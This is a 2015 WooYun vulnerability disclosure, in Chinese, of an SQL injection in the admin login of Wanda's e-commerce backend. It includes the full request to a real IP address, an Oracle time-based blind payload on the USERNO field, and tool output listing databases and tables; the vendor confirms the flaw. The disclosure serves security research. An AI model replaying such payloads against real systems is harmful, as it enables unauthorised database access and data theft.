漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0152755
漏洞标题:万达电商管理后台SQL注射漏洞一枚(可影响全站数据)
相关厂商:万达电商
漏洞作者: 逆流冰河
提交时间:2015-11-08 14:10
修复时间:2015-12-24 17:06
公开时间:2015-12-24 17:06
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-08: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商已经确认,细节仅向厂商公开
2015-11-19: 细节向核心白帽子及相关领域专家公开
2015-11-29: 细节向普通白帽子公开
2015-12-09: 细节向实习白帽子公开
2015-12-24: 细节向公众公开
简要描述:
如下
详细说明:
1,注入点:
POST http://60.10.8.78/LoginUser HTTP/1.1
Host: 60.10.8.78
Connection: keep-alive
Content-Length: 55
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://60.10.8.78
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://60.10.8.78/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=0000o_AhuF1d4IfZTSZnNAoI4wZ:-1
USERNO=liwei&PWD=liwei123&imageField.x=0&imageField.y=0
2,注入参数:userno
---
Parameter: USERNO (POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: USERNO=liwei' AND 3205=DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(78)||CHR(106)||CHR(75),5) AND 'bRdY'='bRdY&PWD=liwei123&imageField.x=0&imageField.y=0
---
back-end DBMS: Oracle
available databases [7]:
[*] DBSNMP
[*] OUTLN
[*] SCMUSER
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
3,这里估计数据和表太多了,我实在不想跑了,就跑出来一部分
跑出来的表的张数是:111 是不是全库的,我就贴出一部分吧
[10:08:40] [INFO] resumed: 111
[10:08:40] [INFO] resumed: YW_GOODSSALE_20141023
[10:08:40] [INFO] resumed: ADVISE_INDEX
[10:08:40] [INFO] resumed: ADVISE_INSTANCE
[10:08:40] [INFO] resumed: ADVISE_MQT
[10:08:40] [INFO] resumed: ADVISE_PARTITION
[10:08:40] [INFO] resumed: ADVISE_TABLE
[10:08:40] [INFO] resumed: ADVISE_WORKLOAD
[10:08:40] [INFO] resumed: DU_DUUSER
[10:08:40] [INFO] resumed: DU_LOG
[10:08:40] [INFO] resumed: DU_LOGERROR
[10:08:40] [INFO] resumed: DU_TXTLINE
[10:08:40] [INFO] resumed: DU_TXTSQL
[10:08:40] [INFO] resumed: ERRLOG
[10:08:40] [INFO] resumed: EXPLAIN_ARGUMENT
[10:08:40] [INFO] resumed: EXPLAIN_DIAGNOSTIC
[10:08:40] [INFO] resumed: EXPLAIN_DIAGNOSTIC_DATA
[10:08:40] [INFO] resumed: EXPLAIN_INSTANCE
[10:08:40] [INFO] resumed: EXPLAIN_OBJECT
[10:08:40] [INFO] resumed: EXPLAIN_OPERATORTE
[10:09:05] [INFO] retrieved: EXPLAIN_STATEMENT
[10:09:57] [INFO] retrieved: EXPLAIN_STREAM
[10:10:40] [INFO] retrieved: INF_CONTINF
[10:12:13] [INFO] retrieved: INF_GOODS
[10:13:04] [INFO] retrieved: INF_GOODSCAT
[10:13:44] [INFO] retrieved: INF_SHOP
[10:14:33] [INFO] retrieved: INF_SUPINFO
[10:15:35] [INFO] retrieved: PBCATCOL
[10:16:38] [INFO] retrieved: PBCATEDT
[10:17:13] [INFO] retrieved: PBCATFMT
[10:17:51] [INFO] retrieved: PBCATTBL
[10:18:29] [INFO] retrieved: PBCATVLD
[10:19:10] [INFO] retrieved: SCM_SUPMKT
[10:20:37] [INFO] retrieved: SYS_AL
[10:21:22] [INFO] retrieved: SYS_LOGEVENT
[10:22:58] [INFO] retrieved: SYS_MENU
[10:23:55] [INFO] retrieved: SYS_MESSAGE
[10:25:01] [INFO] retrieved: SYS_MSGTYPE
[10:27:02] [INFO] retrieved: SYS_RLMEU
[10:28:30] [INFO] retrieved: SYS_ROLE
[10:29:38] [INFO] retrieved: SYS_ROLE1
[10:30:23] [INFO] retrieved: SYS_ROLE2
[10:31:13] [INFO] retrieved: SYS_ROLE
4,影响面,谁用谁知道啊
漏洞证明:
如上
修复方案:
20 rank可行?
版权声明:转载请注明来源 逆流冰河@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2015-11-09 17:05
厂商回复:
感谢逆流冰河同学的关注与贡献,马上通知业务整改。
最新状态:
暂无